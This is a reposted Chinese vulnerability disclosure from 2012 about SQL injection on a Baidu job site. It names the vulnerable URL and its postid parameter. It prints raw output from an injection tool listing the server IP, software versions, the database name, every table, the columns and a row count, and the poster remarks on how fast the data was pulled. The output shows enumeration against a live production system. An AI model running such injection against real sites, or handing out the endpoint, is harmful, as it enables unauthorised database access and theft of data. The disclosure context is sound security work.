百度百伯首页sql注入漏洞

2012-7-13 15:31:52 来源:网络转载 浏览:106
百度最新漏洞公布:百度百伯首页sql注入漏洞。

详细说明:
http://www.baijob.com/p/campus/job?postid=7190

Analyzing http://www.baijob.com/p/campus/job?postid=7190
Host IP: 58.68.231.86
Web Server: Apache
Powered-by: PHP/5.3.10
Keyword Found:           
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 3
Valid String Column is 1
Current DB: sr_campus
Count(table_name) of information_schema.tables where table_schema=0x73725F63616D707573 is 6
Tables found: sr_reinfo,sr_reinfo_md5,sr_reinfo_time_temp,sr_seminar,sr_seminar_md5,sr_seminar_time_temp
Count(table_name) of information_schema.tables where table_schema=0x73725F63616D707573 is 6
Tables found: sr_reinfo,sr_reinfo_md5,sr_reinfo_time_temp,sr_seminar,sr_seminar_md5,sr_seminar_time_temp
Count(column_name) of information_schema.columns where table_schema=0x73725F63616D707573 and table_name=0x73725F7265696E666F is 18
Columns found: id,start_time,city,title,content,company_name,official_url,spide_time,visit_url,descriptin,is_usable,work_type,source_id,entity_id,refresh_time,url,ts,status
Count(column_name) of information_schema.columns where table_schema=0x73725F63616D707573 and table_name=0x73725F7265696E666F5F6D6435 is 6
Columns found: id,entity_id,MD5,source_id,system_id,status
Count(column_name) of information_schema.columns where table_schema=0x73725F63616D707573 and table_name=0x73725F7265696E666F5F74696D655F74656D70 is 4
Columns found: id,time,source_id,entity_id
Count(column_name) of information_schema.columns where table_schema=0x73725F63616D707573 and table_name=0x73725F73656D696E6172 is 15
Columns found: id,city,school,location,company_name,start_time,spide_time,visit_url,description,is_usable,url,source_id,entity_id,ts,status
Count(column_name) of information_schema.columns where table_schema=0x73725F63616D707573 and table_name=0x73725F73656D696E61725F6D6435 is 6
Columns found: id,entity_id,MD5,source_id,system_id,status
Count(column_name) of information_schema.columns where table_schema=0x73725F63616D707573 and table_name=0x73725F73656D696E61725F74696D655F74656D70 is 4
Columns found: id,time,source_id,entity_id
Count(*) of sr_campus.sr_seminar_md5 is 1675

漏洞证明:

百伯首页sql注入漏洞
白天的网速真给力,跑起数据来就是快。晚上老牛拉破车一样。

修复方案:
你们有最优秀的工程师,你们懂的。

(0)
(0)